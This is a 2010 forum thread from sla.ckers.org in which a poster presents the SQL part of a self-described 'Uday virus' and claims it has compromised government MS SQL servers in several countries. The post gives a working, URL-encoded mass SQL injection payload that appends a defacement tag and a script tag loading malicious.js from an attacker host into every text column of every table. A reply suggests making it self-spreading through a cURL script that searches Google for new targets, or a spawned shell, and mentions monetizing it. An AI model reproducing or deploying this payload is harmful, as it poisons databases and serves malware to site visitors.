Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Uday virus (SQL+XSS+AJAX)..."vinnu"
Posted by: vinnu
Date: April 04, 2010 02:15PM

Following is the SQL module of our Uday virus. This module has overpowered several govt MS sql server database servers across the world from US, australia, pakistan...etc. in recent times.

The SQL module is itself fully capable of maintaining its own life untill server gets restarted, otherwise the XSS provides it a trigger every next time it will get restarted.
The SQL module is:


';while(1=1)+BEGIN+DECLARE+@Ta+varchar(255),@Co+varchar(4000)+DECLARE+uday+CURSOR+FOR+select+x.name,y.column_name+from+sysobjects+x,information_schema.columns+y+where+x.name=y.table_name+and+x.type='U'+and+(y.data_type='varchar'+or+y.data_type='text')+OPEN+uday+FETCH+NEXT+FROM+uday+INTO+@Ta,@Co+WHILE(@@FETCH_STATUS=0)+BEGIN+exec('update+['%2b@Ta%2b']+set+['%2b@Co%2b']=['%2b@Co%2b']%2b''"vinnu"<br><h1>Legion+of+Xtremers</h1>%3Cscript+src=%22http://attackerserver/malicious.js%22%3E%3C/script%3E''+where+'%2b@Co%2b'+not+like+''XXXX''')FETCH+NEXT+FROM+uday+INTO+@Ta,@Co+END+CLOSE+uday+DEALLOCATE+uday+commit+waitfor+delay+'0:0:10'+END--sp_password



"vinnu"
Legion Of Xtremers (India)

Options: ReplyQuote
Re: Uday virus (SQL+XSS+AJAX)..."vinnu"
Posted by: Skyphire
Date: April 04, 2010 09:59PM

First, it's stored procedure, not a module, and seen plenty of times. 2ndly it's hardly a virus that spreads beyond one target, and therefore dies down instantly. You just inject all tables and fields with your 'team' tag, pretty messy. You could make it a real virus by injecting PHP cURL script (if available on the service) that searches Google for new targets from the injected target, then you got something really autonomous going on, or better spawn a shell to do all the work.

That said, it's ignorant to waste all these resources just to make a point. You could monetize -or use the resources- for better things than simply name-dropping your 'team', no offense but I think you waste your talent here.

Options: ReplyQuote
Re: Uday virus (SQL+XSS+AJAX)..."vinnu"
Posted by: vinnu
Date: April 05, 2010 12:43AM

Well, By saying it as a module, i didn't mean the different languages nomenclature of what a module is actually? (as a module itself in SQL is a something else,...sorry...it became ambiguicious).
Instead i called it a module for myself analogous to a code block.

Secondly, u r right it itself cannot pread beyond untill we cannot add to it the XSS and ajax code blocks.

In database virus/worms in malware2.0 nowadays this kind of approach is used to poison the database records with malware link.

The SQL code is just a part of it and i have posted only the rough one, it is not the actual one, but this also works fine.

It is actually just a cursor which searches for all user type tables for varchar or text type fields.
You can alter it accordingly as ur code needs..."vinnu"

Options: ReplyQuote


Sorry, only registered users may post in this forum.